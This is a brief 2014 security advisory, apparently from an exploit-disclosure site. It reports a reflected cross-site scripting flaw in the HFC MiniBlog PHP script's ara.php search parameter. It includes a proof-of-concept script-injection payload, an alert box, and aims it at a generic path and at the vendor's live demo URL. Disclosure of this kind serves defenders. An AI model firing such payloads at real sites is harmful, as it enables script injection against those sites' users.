HFC MiniBlog Cross Site Scripting

2014.05.05
Credit: kurd-team
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

===================================================== HFC_MiniBlog php script Cross Site Scripting Vulnerability ----------------------------------------------------------- foun by :kurdish hackers team group : kurd-team contact : pshela@yahoo.com site : kurdteam.org ----------------------------------------------------------- ------------------------script----------------------------- ----------------------------------------------------------- site script :http://www.hfc-miniblog.tk/ dawnload :http://turbobit.net/whc8o1cwif2y.html rar password :www.scriptim.org (tested by Maxthon Cloud Browser, firefox) ----the script turkish lang---- ----------------------------------------------------------- Exploit: ------- site.com/path/ara.php?q="><script>alert('explo3ter')</script>&= demo : http://www.hfc-miniblog.tk/ara.php?q="><script>alert('explo3ter')</script>&= ----------------------------------------------------------- Zryan_kurd ,hamw andamani p4kurd.com -----------------------------------------------------------


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top